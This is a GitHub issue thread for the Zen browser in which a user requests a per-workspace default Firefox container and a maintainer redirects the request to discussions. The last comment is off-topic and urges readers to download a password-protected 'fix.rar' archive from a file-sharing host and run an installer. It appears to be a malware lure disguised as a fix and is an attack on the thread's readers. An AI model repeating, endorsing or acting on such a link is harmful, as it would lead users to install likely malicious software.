### ISSUE TITLE
(Feature Request) An option to select default firefox container for each workspace.

### ISSUE THREAD

**Issue by jayam04** [zen-browser/desktop#912]
### What happened?

Firefox supports [Containers](https://support.mozilla.org/en-US/kb/containers?as=u&utm_source=inproduct), which can be used to containerize different websites. If we are able to select default container for different workspace, it would we useful. For instance, having personal email account in personal workspace and work email on work workspace.

### Reproducible?

- [ ] I have checked that this issue cannot be reproduced on Mozilla Firefox.

### Version

1.0.0

### Severity impact

Low

### What platform are you seeing the problem on?

Linux

**Comment by ch4og** [comment]
For enhancements please use discussions, this is not an issue

**Comment by jayam04** [comment]
Apologies.

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
